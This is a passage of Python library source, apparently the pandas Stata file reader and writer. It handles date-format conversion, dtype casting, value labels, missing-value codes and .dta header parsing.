if deltas.max() > MAX_DAY_DELTA or deltas.min() < MIN_DAY_DELTA:
values = [base + relativedelta(days=int(d)) for d in deltas]
return Series(values, index=index)
elif unit == 'ms':
if deltas.max() > MAX_MS_DELTA or deltas.min() < MIN_MS_DELTA:
values = [base + relativedelta(microseconds=(int(d) * 1000))
for d in deltas]
return Series(values, index=index)
else:
raise ValueError('format not understood')
base = to_datetime(base)
deltas = to_timedelta(deltas, unit=unit)
return base + deltas
# TODO: If/when pandas supports more than datetime64[ns], this should be
# improved to use correct range, e.g. datetime[Y] for yearly
bad_locs = np.isnan(dates)
has_bad_values = False
if bad_locs.any():
has_bad_values = True
data_col = Series(dates)
data_col[bad_locs] = 1.0 # Replace with NaT
dates = dates.astype(np.int64)
if fmt in ["%tc", "tc"]: # Delta ms relative to base
base = stata_epoch
ms = dates
conv_dates = convert_delta_safe(base, ms, 'ms')
elif fmt in ["%tC", "tC"]:
from warnings import warn
warn("Encountered %tC format. Leaving in Stata Internal Format.")
conv_dates = Series(dates, dtype=np.object)
if has_bad_values:
conv_dates[bad_locs] = pd.NaT
return conv_dates
elif fmt in ["%td", "td", "%d", "d"]: # Delta days relative to base
base = stata_epoch
days = dates
conv_dates = convert_delta_safe(base, days, 'd')
elif fmt in ["%tw", "tw"]: # does not count leap days - 7 days is a week
year = stata_epoch.year + dates // 52
days = (dates % 52) * 7
conv_dates = convert_year_days_safe(year, days)
elif fmt in ["%tm", "tm"]: # Delta months relative to base
year = stata_epoch.year + dates // 12
month = (dates % 12) + 1
conv_dates = convert_year_month_safe(year, month)
elif fmt in ["%tq", "tq"]: # Delta quarters relative to base
year = stata_epoch.year + dates // 4
month = (dates % 4) * 3 + 1
conv_dates = convert_year_month_safe(year, month)
elif fmt in ["%th", "th"]: # Delta half-years relative to base
year = stata_epoch.year + dates // 2
month = (dates % 2) * 6 + 1
conv_dates = convert_year_month_safe(year, month)
elif fmt in ["%ty", "ty"]: # Years -- not delta
year = dates
month = np.ones_like(dates)
conv_dates = convert_year_month_safe(year, month)
else:
raise ValueError("Date fmt %s not understood" % fmt)
if has_bad_values: # Restore NaT for bad values
conv_dates[bad_locs] = NaT
return conv_dates
def _datetime_to_stata_elapsed_vec(dates, fmt):
"""
Convert from datetime to SIF. http://www.stata.com/help.cgi?datetime
Parameters
----------
dates : Series
Series or array containing datetime.datetime or datetime64[ns] to
convert to the Stata Internal Format given by fmt
fmt : str
The format to convert to. Can be, tc, td, tw, tm, tq, th, ty
"""
index = dates.index
NS_PER_DAY = 24 * 3600 * 1000 * 1000 * 1000
US_PER_DAY = NS_PER_DAY / 1000
def parse_dates_safe(dates, delta=False, year=False, days=False):
d = {}
if is_datetime64_dtype(dates.values):
if delta:
delta = dates - stata_epoch
d['delta'] = delta.values.astype(
np.int64) // 1000 # microseconds
if days or year:
dates = DatetimeIndex(dates)
d['year'], d['month'] = dates.year, dates.month
if days:
days = (dates.astype(np.int64) -
to_datetime(d['year'], format='%Y').astype(np.int64))
d['days'] = days // NS_PER_DAY
elif infer_dtype(dates) == 'datetime':
if delta:
delta = dates.values - stata_epoch
f = lambda x: \
US_PER_DAY * x.days + 1000000 * x.seconds + x.microseconds
v = np.vectorize(f)
d['delta'] = v(delta)
if year:
year_month = dates.apply(lambda x: 100 * x.year + x.month)
d['year'] = year_month.values // 100
d['month'] = (year_month.values - d['year'] * 100)
if days:
f = lambda x: (x - datetime.datetime(x.year, 1, 1)).days
v = np.vectorize(f)
d['days'] = v(dates)
else:
raise ValueError('Columns containing dates must contain either '
'datetime64, datetime.datetime or null values.')
return DataFrame(d, index=index)
bad_loc = isnull(dates)
index = dates.index
if bad_loc.any():
dates = Series(dates)
if is_datetime64_dtype(dates):
dates[bad_loc] = to_datetime(stata_epoch)
else:
dates[bad_loc] = stata_epoch
if fmt in ["%tc", "tc"]:
d = parse_dates_safe(dates, delta=True)
conv_dates = d.delta / 1000
elif fmt in ["%tC", "tC"]:
from warnings import warn
warn("Stata Internal Format tC not supported.")
conv_dates = dates
elif fmt in ["%td", "td"]:
d = parse_dates_safe(dates, delta=True)
conv_dates = d.delta // US_PER_DAY
elif fmt in ["%tw", "tw"]:
d = parse_dates_safe(dates, year=True, days=True)
conv_dates = (52 * (d.year - stata_epoch.year) + d.days // 7)
elif fmt in ["%tm", "tm"]:
d = parse_dates_safe(dates, year=True)
conv_dates = (12 * (d.year - stata_epoch.year) + d.month - 1)
elif fmt in ["%tq", "tq"]:
d = parse_dates_safe(dates, year=True)
conv_dates = 4 * (d.year - stata_epoch.year) + (d.month - 1) // 3
elif fmt in ["%th", "th"]:
d = parse_dates_safe(dates, year=True)
conv_dates = 2 * (d.year - stata_epoch.year) + \
(d.month > 6).astype(np.int)
elif fmt in ["%ty", "ty"]:
d = parse_dates_safe(dates, year=True)
conv_dates = d.year
else:
raise ValueError("Format %s is not a known Stata date format" % fmt)
conv_dates = Series(conv_dates, dtype=np.float64)
missing_value = struct.unpack('<d', b'\x00\x00\x00\x00\x00\x00\xe0\x7f')[0]
conv_dates[bad_loc] = missing_value
return Series(conv_dates, index=index)
excessive_string_length_error = """
Fixed width strings in Stata .dta files are limited to 244 (or fewer)
characters. Column '%s' does not satisfy this restriction.
"""
class PossiblePrecisionLoss(Warning):
pass
precision_loss_doc = """
Column converted from %s to %s, and some data are outside of the lossless
conversion range. This may result in a loss of precision in the saved data.
"""
class ValueLabelTypeMismatch(Warning):
pass
value_label_mismatch_doc = """
Stata value labels (pandas categories) must be strings. Column {0} contains
non-string labels which will be converted to strings. Please check that the
Stata data file created has not lost information due to duplicate labels.
"""
class InvalidColumnName(Warning):
pass
invalid_name_doc = """
Not all pandas column names were valid Stata variable names.
The following replacements have been made:
{0}
If this is not what you expect, please make sure you have Stata-compliant
column names in your DataFrame (strings only, max 32 characters, only
alphanumerics and underscores, no Stata reserved words)
"""
def _cast_to_stata_types(data):
"""Checks the dtypes of the columns of a pandas DataFrame for
compatibility with the data types and ranges supported by Stata, and
converts if necessary.
Parameters
----------
data : DataFrame
The DataFrame to check and convert
Notes
-----
Numeric columns in Stata must be one of int8, int16, int32, float32 or
float64, with some additional value restrictions. int8 and int16 columns
are checked for violations of the value restrictions and upcast if needed.
int64 data is not usable in Stata, and so it is downcast to int32 whenever
the value are in the int32 range, and sidecast to float64 when larger than
this range. If the int64 values are outside of the range of those
perfectly representable as float64 values, a warning is raised.
bool columns are cast to int8. uint colums are converted to int of the
same size if there is no loss in precision, other wise are upcast to a
larger type. uint64 is currently not supported since it is concerted to
object in a DataFrame.
"""
ws = ''
# original, if small, if large
conversion_data = ((np.bool, np.int8, np.int8),
(np.uint8, np.int8, np.int16),
(np.uint16, np.int16, np.int32),
(np.uint32, np.int32, np.int64))
float32_max = struct.unpack('<f', b'\xff\xff\xff\x7e')[0]
float64_max = struct.unpack('<d', b'\xff\xff\xff\xff\xff\xff\xdf\x7f')[0]
for col in data:
dtype = data[col].dtype
# Cast from unsupported types to supported types
for c_data in conversion_data:
if dtype == c_data[0]:
if data[col].max() <= np.iinfo(c_data[1]).max:
dtype = c_data[1]
else:
dtype = c_data[2]
if c_data[2] == np.float64: # Warn if necessary
if data[col].max() >= 2 ** 53:
ws = precision_loss_doc % ('uint64', 'float64')
data[col] = data[col].astype(dtype)
# Check values and upcast if necessary
if dtype == np.int8:
if data[col].max() > 100 or data[col].min() < -127:
data[col] = data[col].astype(np.int16)
elif dtype == np.int16:
if data[col].max() > 32740 or data[col].min() < -32767:
data[col] = data[col].astype(np.int32)
elif dtype == np.int64:
if (data[col].max() <= 2147483620 and
data[col].min() >= -2147483647):
data[col] = data[col].astype(np.int32)
else:
data[col] = data[col].astype(np.float64)
if data[col].max() >= 2 ** 53 or data[col].min() <= -2 ** 53:
ws = precision_loss_doc % ('int64', 'float64')
elif dtype in (np.float32, np.float64):
value = data[col].max()
if np.isinf(value):
msg = 'Column {0} has a maximum value of infinity which is ' \
'outside the range supported by Stata.'
raise ValueError(msg.format(col))
if dtype == np.float32 and value > float32_max:
data[col] = data[col].astype(np.float64)
elif dtype == np.float64:
if value > float64_max:
msg = 'Column {0} has a maximum value ({1}) outside the ' \
'range supported by Stata ({1})'
raise ValueError(msg.format(col, value, float64_max))
if ws:
import warnings
warnings.warn(ws, PossiblePrecisionLoss)
return data
class StataValueLabel(object):
"""
Parse a categorical column and prepare formatted output
Parameters
-----------
value : int8, int16, int32, float32 or float64
The Stata missing value code
Attributes
----------
string : string
String representation of the Stata missing value
value : int8, int16, int32, float32 or float64
The original encoded missing value
Methods
-------
generate_value_label
"""
def __init__(self, catarray):
self.labname = catarray.name
categories = catarray.cat.categories
self.value_labels = list(zip(np.arange(len(categories)), categories))
self.value_labels.sort(key=lambda x: x[0])
self.text_len = np.int32(0)
self.off = []
self.val = []
self.txt = []
self.n = 0
# Compute lengths and setup lists of offsets and labels
for vl in self.value_labels:
category = vl[1]
if not isinstance(category, string_types):
category = str(category)
import warnings
warnings.warn(value_label_mismatch_doc.format(catarray.name),
ValueLabelTypeMismatch)
self.off.append(self.text_len)
self.text_len += len(category) + 1 # +1 for the padding
self.val.append(vl[0])
self.txt.append(category)
self.n += 1
if self.text_len > 32000:
raise ValueError('Stata value labels for a single variable must '
'have a combined length less than 32,000 '
'characters.')
# Ensure int32
self.off = np.array(self.off, dtype=np.int32)
self.val = np.array(self.val, dtype=np.int32)
# Total length
self.len = 4 + 4 + 4 * self.n + 4 * self.n + self.text_len
def _encode(self, s):
"""
Python 3 compatability shim
"""
if compat.PY3:
return s.encode(self._encoding)
else:
return s
def generate_value_label(self, byteorder, encoding):
"""
Parameters
----------
byteorder : str
Byte order of the output
encoding : str
File encoding
Returns
-------
value_label : bytes
Bytes containing the formatted value label
"""
self._encoding = encoding
bio = BytesIO()
null_string = '\x00'
null_byte = b'\x00'
# len
bio.write(struct.pack(byteorder + 'i', self.len))
# labname
labname = self._encode(_pad_bytes(self.labname[:32], 33))
bio.write(labname)
# padding - 3 bytes
for i in range(3):
bio.write(struct.pack('c', null_byte))
# value_label_table
# n - int32
bio.write(struct.pack(byteorder + 'i', self.n))
# textlen - int32
bio.write(struct.pack(byteorder + 'i', self.text_len))
# off - int32 array (n elements)
for offset in self.off:
bio.write(struct.pack(byteorder + 'i', offset))
# val - int32 array (n elements)
for value in self.val:
bio.write(struct.pack(byteorder + 'i', value))
# txt - Text labels, null terminated
for text in self.txt:
bio.write(self._encode(text + null_string))
bio.seek(0)
return bio.read()
class StataMissingValue(StringMixin):
"""
An observation's missing value.
Parameters
-----------
value : int8, int16, int32, float32 or float64
The Stata missing value code
Attributes
----------
string : string
String representation of the Stata missing value
value : int8, int16, int32, float32 or float64
The original encoded missing value
Notes
-----
More information: <http://www.stata.com/help.cgi?missing>
Integer missing values make the code '.', '.a', ..., '.z' to the ranges
101 ... 127 (for int8), 32741 ... 32767 (for int16) and 2147483621 ...
2147483647 (for int32). Missing values for floating point data types are
more complex but the pattern is simple to discern from the following table.
np.float32 missing values (float in Stata)
0000007f .
0008007f .a
0010007f .b
...
00c0007f .x
00c8007f .y
00d0007f .z
np.float64 missing values (double in Stata)
000000000000e07f .
000000000001e07f .a
000000000002e07f .b
...
000000000018e07f .x
000000000019e07f .y
00000000001ae07f .z
"""
# Construct a dictionary of missing values
MISSING_VALUES = {}
bases = (101, 32741, 2147483621)
for b in bases:
# Conversion to long to avoid hash issues on 32 bit platforms #8968
MISSING_VALUES[compat.long(b)] = '.'
for i in range(1, 27):
MISSING_VALUES[compat.long(i + b)] = '.' + chr(96 + i)
float32_base = b'\x00\x00\x00\x7f'
increment = struct.unpack('<i', b'\x00\x08\x00\x00')[0]
for i in range(27):
value = struct.unpack('<f', float32_base)[0]
MISSING_VALUES[value] = '.'
if i > 0:
MISSING_VALUES[value] += chr(96 + i)
int_value = struct.unpack('<i', struct.pack('<f', value))[
0] + increment
float32_base = struct.pack('<i', int_value)
float64_base = b'\x00\x00\x00\x00\x00\x00\xe0\x7f'
increment = struct.unpack('q', b'\x00\x00\x00\x00\x00\x01\x00\x00')[0]
for i in range(27):
value = struct.unpack('<d', float64_base)[0]
MISSING_VALUES[value] = '.'
if i > 0:
MISSING_VALUES[value] += chr(96 + i)
int_value = struct.unpack('q', struct.pack('<d', value))[0] + increment
float64_base = struct.pack('q', int_value)
BASE_MISSING_VALUES = {'int8': 101,
'int16': 32741,
'int32': 2147483621,
'float32': struct.unpack('<f', float32_base)[0],
'float64': struct.unpack('<d', float64_base)[0]}
def __init__(self, value):
self._value = value
# Conversion to long to avoid hash issues on 32 bit platforms #8968
value = compat.long(value) if value < 2147483648 else float(value)
self._str = self.MISSING_VALUES[value]
string = property(lambda self: self._str,
doc="The Stata representation of the missing value: "
"'.', '.a'..'.z'")
value = property(lambda self: self._value,
doc='The binary representation of the missing value.')
def __unicode__(self):
return self.string
def __repr__(self):
# not perfect :-/
return "%s(%s)" % (self.__class__, self)
def __eq__(self, other):
return (isinstance(other, self.__class__) and
self.string == other.string and self.value == other.value)
@classmethod
def get_base_missing_value(cls, dtype):
if dtype == np.int8:
value = cls.BASE_MISSING_VALUES['int8']
elif dtype == np.int16:
value = cls.BASE_MISSING_VALUES['int16']
elif dtype == np.int32:
value = cls.BASE_MISSING_VALUES['int32']
elif dtype == np.float32:
value = cls.BASE_MISSING_VALUES['float32']
elif dtype == np.float64:
value = cls.BASE_MISSING_VALUES['float64']
else:
raise ValueError('Unsupported dtype')
return value
class StataParser(object):
_default_encoding = 'iso-8859-1'
def __init__(self, encoding):
self._encoding = encoding
# type code.
# --------------------
# str1 1 = 0x01
# str2 2 = 0x02
# ...
# str244 244 = 0xf4
# byte 251 = 0xfb (sic)
# int 252 = 0xfc
# long 253 = 0xfd
# float 254 = 0xfe
# double 255 = 0xff
# --------------------
# NOTE: the byte type seems to be reserved for categorical variables
# with a label, but the underlying variable is -127 to 100
# we're going to drop the label and cast to int
self.DTYPE_MAP = \
dict(
lzip(range(1, 245), ['a' + str(i) for i in range(1, 245)]) +
[
(251, np.int8),
(252, np.int16),
(253, np.int32),
(254, np.float32),
(255, np.float64)
]
)
self.DTYPE_MAP_XML = \
dict(
[
(32768, np.uint8), # Keys to GSO
(65526, np.float64),
(65527, np.float32),
(65528, np.int32),
(65529, np.int16),
(65530, np.int8)
]
)
self.TYPE_MAP = lrange(251) + list('bhlfd')
self.TYPE_MAP_XML = \
dict(
[
# Not really a Q, unclear how to handle byteswap
(32768, 'Q'),
(65526, 'd'),
(65527, 'f'),
(65528, 'l'),
(65529, 'h'),
(65530, 'b')
]
)
# NOTE: technically, some of these are wrong. there are more numbers
# that can be represented. it's the 27 ABOVE and BELOW the max listed
# numeric data type in [U] 12.2.2 of the 11.2 manual
float32_min = b'\xff\xff\xff\xfe'
float32_max = b'\xff\xff\xff\x7e'
float64_min = b'\xff\xff\xff\xff\xff\xff\xef\xff'
float64_max = b'\xff\xff\xff\xff\xff\xff\xdf\x7f'
self.VALID_RANGE = {
'b': (-127, 100),
'h': (-32767, 32740),
'l': (-2147483647, 2147483620),
'f': (np.float32(struct.unpack('<f', float32_min)[0]),
np.float32(struct.unpack('<f', float32_max)[0])),
'd': (np.float64(struct.unpack('<d', float64_min)[0]),
np.float64(struct.unpack('<d', float64_max)[0]))
}
self.OLD_TYPE_MAPPING = {
98: 251, # byte
105: 252, # int
108: 253, # long
102: 254 # float
# don't know old code for double
}
# These missing values are the generic '.' in Stata, and are used
# to replace nans
self.MISSING_VALUES = {
'b': 101,
'h': 32741,
'l': 2147483621,
'f': np.float32(struct.unpack('<f', b'\x00\x00\x00\x7f')[0]),
'd': np.float64(
struct.unpack('<d', b'\x00\x00\x00\x00\x00\x00\xe0\x7f')[0])
}
self.NUMPY_TYPE_MAP = {
'b': 'i1',
'h': 'i2',
'l': 'i4',
'f': 'f4',
'd': 'f8',
'Q': 'u8'
}
# Reserved words cannot be used as variable names
self.RESERVED_WORDS = ('aggregate', 'array', 'boolean', 'break',
'byte', 'case', 'catch', 'class', 'colvector',
'complex', 'const', 'continue', 'default',
'delegate', 'delete', 'do', 'double', 'else',
'eltypedef', 'end', 'enum', 'explicit',
'export', 'external', 'float', 'for', 'friend',
'function', 'global', 'goto', 'if', 'inline',
'int', 'local', 'long', 'NULL', 'pragma',
'protected', 'quad', 'rowvector', 'short',
'typedef', 'typename', 'virtual')
class StataReader(StataParser, BaseIterator):
__doc__ = _stata_reader_doc
def __init__(self, path_or_buf, convert_dates=True,
convert_categoricals=True, index=None,
convert_missing=False, preserve_dtypes=True,
columns=None, order_categoricals=True,
encoding='iso-8859-1', chunksize=None):
super(StataReader, self).__init__(encoding)
self.col_sizes = ()
# Arguments to the reader (can be temporarily overridden in
# calls to read).
self._convert_dates = convert_dates
self._convert_categoricals = convert_categoricals
self._index = index
self._convert_missing = convert_missing
self._preserve_dtypes = preserve_dtypes
self._columns = columns
self._order_categoricals = order_categoricals
self._encoding = encoding
self._chunksize = chunksize
# State variables for the file
self._has_string_data = False
self._missing_values = False
self._can_read_value_labels = False
self._column_selector_set = False
self._value_labels_read = False
self._data_read = False
self._dtype = None
self._lines_read = 0
self._native_byteorder = _set_endianness(sys.byteorder)
if isinstance(path_or_buf, str):
path_or_buf, encoding, _ = get_filepath_or_buffer(
path_or_buf, encoding=self._default_encoding
)
if isinstance(path_or_buf, (str, compat.text_type, bytes)):
self.path_or_buf = open(path_or_buf, 'rb')
else:
# Copy to BytesIO, and ensure no encoding
contents = path_or_buf.read()
try:
contents = contents.encode(self._default_encoding)
except:
pass
self.path_or_buf = BytesIO(contents)
self._read_header()
def __enter__(self):
""" enter context manager """
return self
def __exit__(self, exc_type, exc_value, traceback):
""" exit context manager """
self.close()
def close(self):
""" close the handle if its open """
try:
self.path_or_buf.close()
except IOError:
pass
def _read_header(self):
first_char = self.path_or_buf.read(1)
if struct.unpack('c', first_char)[0] == b'<':
self._read_new_header(first_char)
else:
self._read_old_header(first_char)
self.has_string_data = len([x for x in self.typlist
if type(x) is int]) > 0
# calculate size of a data record
self.col_sizes = lmap(lambda x: self._calcsize(x), self.typlist)
# remove format details from %td
self.fmtlist = ["%td" if x.startswith("%td") else x
for x in self.fmtlist]
def _read_new_header(self, first_char):
# The first part of the header is common to 117 and 118.
self.path_or_buf.read(27) # stata_dta><header><release>
self.format_version = int(self.path_or_buf.read(3))
if self.format_version not in [117, 118]:
raise ValueError(_version_error)
self.path_or_buf.read(21) # </release><byteorder>
self.byteorder = self.path_or_buf.read(3) == "MSF" and '>' or '<'
self.path_or_buf.read(15) # </byteorder><K>
self.nvar = struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
self.path_or_buf.read(7) # </K><N>
self.nobs = self._get_nobs()
self.path_or_buf.read(11) # </N><label>
self.data_label = self._get_data_label()
self.path_or_buf.read(19) # </label><timestamp>
self.time_stamp = self._get_time_stamp()
self.path_or_buf.read(26) # </timestamp></header><map>
self.path_or_buf.read(8) # 0x0000000000000000
self.path_or_buf.read(8) # position of <map>
self._seek_vartypes = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 16
self._seek_varnames = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 10
self._seek_sortlist = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 10
self._seek_formats = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 9
self._seek_value_label_names = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 19
# Requires version-specific treatment
self._seek_variable_labels = self._get_seek_variable_labels()
self.path_or_buf.read(8) # <characteristics>
self.data_location = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 6
self.seek_strls = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 7
self.seek_value_labels = struct.unpack(
self.byteorder + 'q', self.path_or_buf.read(8))[0] + 14
self.typlist, self.dtyplist = self._get_dtypes(self._seek_vartypes)
self.path_or_buf.seek(self._seek_varnames)
self.varlist = self._get_varlist()
self.path_or_buf.seek(self._seek_sortlist)
self.srtlist = struct.unpack(
self.byteorder + ('h' * (self.nvar + 1)),
self.path_or_buf.read(2 * (self.nvar + 1))
)[:-1]
self.path_or_buf.seek(self._seek_formats)
self.fmtlist = self._get_fmtlist()
self.path_or_buf.seek(self._seek_value_label_names)
self.lbllist = self._get_lbllist()
self.path_or_buf.seek(self._seek_variable_labels)
self._variable_labels = self._get_variable_labels()
# Get data type information, works for versions 117-118.
def _get_dtypes(self, seek_vartypes):
self.path_or_buf.seek(seek_vartypes)
raw_typlist = [struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
for i in range(self.nvar)]
def f(typ):
if typ <= 2045:
return typ
try:
return self.TYPE_MAP_XML[typ]
except KeyError:
raise ValueError("cannot convert stata types [{0}]".
format(typ))
typlist = [f(x) for x in raw_typlist]
def f(typ):
if typ <= 2045:
return str(typ)
try:
return self.DTYPE_MAP_XML[typ]
except KeyError:
raise ValueError("cannot convert stata dtype [{0}]"
.format(typ))
dtyplist = [f(x) for x in raw_typlist]
return typlist, dtyplist
def _get_varlist(self):
if self.format_version == 117:
b = 33
elif self.format_version == 118:
b = 129
return [self._null_terminate(self.path_or_buf.read(b))
for i in range(self.nvar)]
# Returns the format list
def _get_fmtlist(self):
if self.format_version == 118:
b = 57
elif self.format_version > 113:
b = 49
elif self.format_version > 104:
b = 12
else:
b = 7
return [self._null_terminate(self.path_or_buf.read(b))
for i in range(self.nvar)]
# Returns the label list
def _get_lbllist(self):
if self.format_version >= 118:
b = 129
elif self.format_version > 108:
b = 33
else:
b = 9
return [self._null_terminate(self.path_or_buf.read(b))
for i in range(self.nvar)]
def _get_variable_labels(self):
if self.format_version == 118:
vlblist = [self._decode(self.path_or_buf.read(321))
for i in range(self.nvar)]
elif self.format_version > 105:
vlblist = [self._null_terminate(self.path_or_buf.read(81))
for i in range(self.nvar)]
else:
vlblist = [self._null_terminate(self.path_or_buf.read(32))
for i in range(self.nvar)]
return vlblist
def _get_nobs(self):
if self.format_version == 118:
return struct.unpack(self.byteorder + 'Q',
self.path_or_buf.read(8))[0]
else:
return struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
def _get_data_label(self):
if self.format_version == 118:
strlen = struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
return self._decode(self.path_or_buf.read(strlen))
elif self.format_version == 117:
strlen = struct.unpack('b', self.path_or_buf.read(1))[0]
return self._null_terminate(self.path_or_buf.read(strlen))
elif self.format_version > 105:
return self._null_terminate(self.path_or_buf.read(81))
else:
return self._null_terminate(self.path_or_buf.read(32))
def _get_time_stamp(self):
if self.format_version == 118:
strlen = struct.unpack('b', self.path_or_buf.read(1))[0]
return self.path_or_buf.read(strlen).decode("utf-8")
elif self.format_version == 117:
strlen = struct.unpack('b', self.path_or_buf.read(1))[0]
return self._null_terminate(self.path_or_buf.read(strlen))
elif self.format_version > 104:
return self._null_terminate(self.path_or_buf.read(18))
else:
raise ValueError()
def _get_seek_variable_labels(self):
if self.format_version == 117:
self.path_or_buf.read(8) # <variable_lables>, throw away
# Stata 117 data files do not follow the described format. This is
# a work around that uses the previous label, 33 bytes for each
# variable, 20 for the closing tag and 17 for the opening tag
return self._seek_value_label_names + (33 * self.nvar) + 20 + 17
elif self.format_version == 118:
return struct.unpack(self.byteorder + 'q',
self.path_or_buf.read(8))[0] + 17
else:
raise ValueError()
def _read_old_header(self, first_char):
self.format_version = struct.unpack('b', first_char)[0]
if self.format_version not in [104, 105, 108, 111, 113, 114, 115]:
raise ValueError(_version_error)
self.byteorder = struct.unpack('b', self.path_or_buf.read(1))[
0] == 0x1 and '>' or '<'
self.filetype = struct.unpack('b', self.path_or_buf.read(1))[0]
self.path_or_buf.read(1) # unused
self.nvar = struct.unpack(self.byteorder + 'H',
self.path_or_buf.read(2))[0]
self.nobs = self._get_nobs()
self.data_label = self._get_data_label()
self.time_stamp = self._get_time_stamp()
# descriptors
if self.format_version > 108:
typlist = [ord(self.path_or_buf.read(1))
for i in range(self.nvar)]
else:
buf = self.path_or_buf.read(self.nvar)
typlistb = np.frombuffer(buf, dtype=np.uint8)
typlist = []
for tp in typlistb:
if tp in self.OLD_TYPE_MAPPING:
typlist.append(self.OLD_TYPE_MAPPING[tp])
else:
typlist.append(tp - 127) # py2 string, py3 bytes
try:
self.typlist = [self.TYPE_MAP[typ] for typ in typlist]
except:
raise ValueError("cannot convert stata types [{0}]"
.format(','.join(str(x) for x in typlist)))
try:
self.dtyplist = [self.DTYPE_MAP[typ] for typ in typlist]
except:
raise ValueError("cannot convert stata dtypes [{0}]"
.format(','.join(str(x) for x in typlist)))
if self.format_version > 108:
self.varlist = [self._null_terminate(self.path_or_buf.read(33))
for i in range(self.nvar)]
else:
self.varlist = [self._null_terminate(self.path_or_buf.read(9))
for i in range(self.nvar)]
self.srtlist = struct.unpack(
self.byteorder + ('h' * (self.nvar + 1)),
self.path_or_buf.read(2 * (self.nvar + 1))
)[:-1]
self.fmtlist = self._get_fmtlist()
self.lbllist = self._get_lbllist()
self._variable_labels = self._get_variable_labels()
# ignore expansion fields (Format 105 and later)
# When reading, read five bytes; the last four bytes now tell you
# the size of the next read, which you discard. You then continue
# like this until you read 5 bytes of zeros.
if self.format_version > 104:
while True:
data_type = struct.unpack(self.byteorder + 'b',
self.path_or_buf.read(1))[0]
if self.format_version > 108:
data_len = struct.unpack(self.byteorder + 'i',
self.path_or_buf.read(4))[0]
else:
data_len = struct.unpack(self.byteorder + 'h',
self.path_or_buf.read(2))[0]
if data_type == 0:
break
self.path_or_buf.read(data_len)
# necessary data to continue parsing
self.data_location = self.path_or_buf.tell()
def _calcsize(self, fmt):
return (type(fmt) is int and fmt or
struct.calcsize(self.byteorder + fmt))
def _decode(self, s):
s = s.partition(b"\0")[0]
return s.decode('utf-8')
def _null_terminate(self, s):
if compat.PY3 or self._encoding is not None:
# have bytes not strings, so must decode
s = s.partition(b"\0")[0]
return s.decode(self._encoding or self._default_encoding)
else:
null_byte = "\0"
try:
return s.lstrip(null_byte)[:s.index(null_byte)]
except:
return s
def _read_value_labels(self):
if self.format_version <= 108:
# Value labels are not supported in version 108 and earlier.
return
if self._value_labels_read:
# Don't read twice
return
if self.format_version >= 117:
self.path_or_buf.seek(self.seek_value_labels)
else:
offset = self.nobs * self._dtype.itemsize
self.path_or_buf.seek(self.data_location + offset)
self._value_labels_read = True
self.value_label_dict = dict()
while True:
if self.format_version >= 117:
if self.path_or_buf.read(5) == b'</val': # <lbl>
break # end of value label table
slength = self.path_or_buf.read(4)
if not slength:
break # end of value label table (format < 117)
if self.format_version <= 117:
labname = self._null_terminate(self.path_or_buf.read(33))
else:
labname = self._decode(self.path_or_buf.read(129))
self.path_or_buf.read(3) # padding
n = struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
txtlen = struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
off = np.frombuffer(self.path_or_buf.read(4 * n),
dtype=self.byteorder + "i4",
count=n)
val = np.frombuffer(self.path_or_buf.read(4 * n),
dtype=self.byteorder + "i4",
count=n)
ii = np.argsort(off)
off = off[ii]
val = val[ii]
txt = self.path_or_buf.read(txtlen)
self.value_label_dict[labname] = dict()
for i in range(n):
end = off[i + 1] if i < n - 1 else txtlen
if self.format_version <= 117:
self.value_label_dict[labname][val[i]] = (
self._null_terminate(txt[off[i]:end]))
else:
self.value_label_dict[labname][val[i]] = (
self._decode(txt[off[i]:end]))
if self.format_version >= 117:
self.path_or_buf.read(6) # </lbl>
self._value_labels_read = True
def _read_strls(self):
self.path_or_buf.seek(self.seek_strls)
self.GSO = {0: ''}
while True:
if self.path_or_buf.read(3) != b'GSO':
break
if self.format_version == 117:
v_o = struct.unpack(self.byteorder + 'Q',
self.path_or_buf.read(8))[0]
else:
buf = self.path_or_buf.read(12)
# Only tested on little endian file on little endian machine.
if self.byteorder == '<':
buf = buf[0:2] + buf[4:10]
else:
buf = buf[0:2] + buf[6:]
v_o = struct.unpack('Q', buf)[0]
typ = struct.unpack('B', self.path_or_buf.read(1))[0]
length = struct.unpack(self.byteorder + 'I',
self.path_or_buf.read(4))[0]
va = self.path_or_buf.read(length)
if typ == 130:
encoding = 'utf-8'
if self.format_version == 117:
encoding = self._encoding or self._default_encoding
va = va[0:-1].decode(encoding)
self.GSO[v_o] = va
# legacy
@Appender('DEPRECATED: ' + _data_method_doc)
def data(self, **kwargs):
import warnings
warnings.warn("'data' is deprecated, use 'read' instead")
if self._data_read:
raise Exception("Data has already been read.")
self._data_read = True
return self.read(None, **kwargs)
def __next__(self):
return self.read(nrows=self._chunksize or 1)
def get_chunk(self, size=None):
"""
Reads lines from Stata file and returns as dataframe
Parameters
----------
size : int, defaults to None
Number of lines to read. If None, reads whole file.
Returns
-------
DataFrame
"""
if size is None:
size = self._chunksize
return self.read(nrows=size)
@Appender(_read_method_doc)
def read(self, nrows=None, convert_dates=None,
convert_categoricals=None, index=None,
convert_missing=None, preserve_dtypes=None,
columns=None, order_categoricals=None):
# Handle empty file or chunk. If reading incrementally raise
# StopIteration. If reading the whole thing return an empty
# data frame.
if (self.nobs == 0) and (nrows is None):
self._can_read_value_labels = True
self._data_read = True
self.close()
return DataFrame(columns=self.varlist)
# Handle options
if convert_dates is None:
convert_dates = self._convert_dates
if convert_categoricals is None:
convert_categoricals = self._convert_categoricals
if convert_missing is None:
convert_missing = self._convert_missing
if preserve_dtypes is None:
preserve_dtypes = self._preserve_dtypes
if columns is None:
columns = self._columns
if order_categoricals is None:
order_categoricals = self._order_categoricals
if nrows is None:
nrows = self.nobs
if (self.format_version >= 117) and (self._dtype is None):
self._can_read_value_labels = True
self._read_strls()
# Setup the dtype.
if self._dtype is None:
